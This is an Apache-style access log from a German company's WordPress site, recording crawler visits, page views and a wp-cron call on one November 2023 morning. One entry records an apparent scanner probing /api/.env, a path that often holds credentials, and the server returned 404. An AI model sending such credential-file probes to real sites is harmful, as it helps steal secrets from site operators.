89.246.112.0 - - [08/Nov/2023:05:20:29 +0100] "HEAD /kontakt/ HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.246.112.0 - - [08/Nov/2023:05:20:29 +0100] "GET /kontakt/ HTTP/1.1" 200 58156 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/50.0"
62.141.44.0 - - [08/Nov/2023:05:21:44 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
45.59.126.0 - - [08/Nov/2023:05:30:23 +0100] "GET / HTTP/1.1" 400 347 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/537.36"
202.73.34.0 - - [08/Nov/2023:05:35:31 +0100] "GET /api/.env HTTP/1.1" 404 2547 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
202.73.34.0 - - [08/Nov/2023:05:35:31 +0100] "POST /api HTTP/1.1" 404 2537 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.22.240.0 - - [08/Nov/2023:05:43:47 +0100] "GET /robots.txt HTTP/1.1" 301 245 "-" "DnBCrawler-Analytics"
34.22.240.0 - - [08/Nov/2023:05:43:47 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "DnBCrawler-Analytics"
34.22.240.0 - - [08/Nov/2023:05:43:48 +0100] "GET / HTTP/1.1" 301 235 "-" "DnBCrawler-Analytics"
34.22.240.0 - - [08/Nov/2023:05:43:48 +0100] "GET / HTTP/1.1" 200 16118 "-" "DnBCrawler-Analytics"
81.169.178.0 - - [08/Nov/2023:05:43:47 +0100] "POST /wp-cron.php?doing_wp_cron=1699418627.2659618854522705078125 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699418627.2659618854522705078125" "WordPress/5.8.8; https://www.ipcbusiness.de"
34.22.240.0 - - [08/Nov/2023:05:43:50 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "DnBCrawler-Analytics"
34.22.240.0 - - [08/Nov/2023:05:43:51 +0100] "GET /ueber-uns/ipc-business-gmbh-firmeninformation/ HTTP/1.1" 200 11923 "-" "DnBCrawler-Analytics"
34.22.240.0 - - [08/Nov/2023:05:43:52 +0100] "GET /ueber-uns/firmeninformation/ HTTP/1.1" 200 9945 "-" "DnBCrawler-Analytics"
